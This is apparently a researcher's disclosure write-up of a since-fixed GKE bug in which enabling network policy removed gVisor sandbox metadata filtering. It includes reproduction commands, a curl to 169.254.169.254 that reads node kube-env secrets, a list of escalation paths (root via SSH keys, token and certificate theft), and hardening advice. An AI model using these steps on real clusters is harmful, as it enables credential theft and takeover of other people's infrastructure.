Escaping GKE gVisor sandboxing using metadata

Introduction

GKE is a Google Cloud service that offers a managed Kubernetes cluster, the nodes of the clusters are running on Google Cloud VM instances, the control plane and network is fully managed by GKE.

GKE offers a sandboxing feature (https://cloud.google.com/kubernetes-engine/docs/concepts/sandbox-pods), based on gVisor (https://gvisor.dev/docs/) it protects the host kernel from untrusted code. This sandboxing offers a very good isolation and allow SaaS business to execute unknown code submitted by their users.

I tried to use this feature to run isolated workloads and found that the isolation was not entirely effective and that the access to the metadata API was possible under certain conditions.

Network isolation using network policy

By default, in a Kubernetes cluster all pods are able to communicate, GKE recommends to use Network Policy to restrict the network traffic between pods (https://cloud.google.com/kubernetes-engine/docs/how-to/hardening-your-cluster#restrict_with_network_policy).

When running untrusted code, it is a good practice to isolate your clients from each other and from your own services.

With this feature, it is easy to define a policy and attach it to a group of pods and restrict the network access for theses pods.

Sandbox metadata protection

Google Cloud team documents how to harden the workload isolation using GKE sandbox (https://cloud.google.com/kubernetes-engine/docs/how-to/sandbox-pods#sandboxed-application), and gives some hints on how to configure and test the access to the metadata.

To validate that the filtering is properly enabled, you can launch a new pod and run the following command:

curl -s "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env" -H "Metadata-Flavor: Google"

This command is failing as described in the documentation because there is filtering denying the access to the metadata API.

By default the instance metadata API server is not supposed to be accessible from any sandboxed pod.

Bug found

When testing the network isolation for untrusted pods, I tried to configure the network policy on the cluster and applied some network filtering rules for the pods that I wanted to isolate.

After more testing, I found out that I was able to query the metadata API, it appears that the network filtering applied for the gVisor sandboxed pod by the GKE team was entirely disabled when the network policy was activated.

Since this sandboxing feature is supposed to run untrusted code, this would give an attacker access to sensitive informations about the node, project and Kubernetes cluster.

The bug was reported to the VRP team and quickly fixed, I was able to mitigate this by manually filtering the 169.254.169.254 IP in the network policy applied to theses pods.

How to reproduce

You can follow the steps here : https://cloud.google.com/kubernetes-engine/docs/how-to/sandbox-pods

Create a new cluster with network policy enabled

gcloud container clusters create cluster-name --enable-network-policy

Create a new gVisor pool

gcloud container node-pools create gvisor \
  --cluster=cluster-1 \
  --node-version=1.16.13-gke.401 \
  --machine-type=e2-standard-2 \
  --image-type=cos_containerd \
  --sandbox type=gvisor --zone europe-west1-c

Apply the test configuration from the documentation

# sandbox-metadata-test.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: fedora
  labels:
    app: fedora
spec:
  replicas: 1
  selector:
    matchLabels:
      app: fedora
  template:
    metadata:
      labels:
        app: fedora
    spec:
      runtimeClassName: gvisor
      containers:
        - name: fedora
          image: fedora
          command: ['/bin/sleep', '10000']

Launch a shell

kubectl exec -it pod-name /bin/sh

Enjoy full access on the metadata API

curl  "http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env" -H "Metadata-Flavor: Google"
...
ALLOCATE_NODE_CIDRS: "true"
API_SERVER_TEST_LOG_LEVEL: --v=3
...

Going deeper

With this metadata exposure bug, an attacker may gain access to sensitive information about the node, project and Kubernetes cluster.

Depending of the configuration, this could lead to:

read project id
read public ssh keys
get node information (name, ip, ...)
add his own ssh key and gain root access on the node
get Kubernetes configuration and certificate
access the Kubernetes cluster
impersonate a Kubernetes node
retrieve an service account token
access / create / edit / delete project resources

Better isolation of untrusted code in GKE

Even when the isolation is properly working you have many ways to protect yourself against this kind of metadata exposure.

A few recommandation for running untrusted code in GKE:

Always double check that the network policy is properly applied
Filter out all internal ranges, whitelist only the required
gVisor is fine but may be tricky to configure in Kubernetes, double check using dmesg if you are running inside the sandbox
Do not use default identities for instance identity
You can use multiple projects to isolate workload / clients
Do not use cluster dns
Create specific node pool for untrusted code
Use workload identity https://cloud.google.com/kubernetes-engine/docs/how-to/workload-identity
Use metadata concealment https://cloud.google.com/kubernetes-engine/docs/how-to/protecting-cluster-metadata#concealment
Use shielded GKE nodes https://cloud.google.com/kubernetes-engine/docs/how-to/shielded-gke-nodes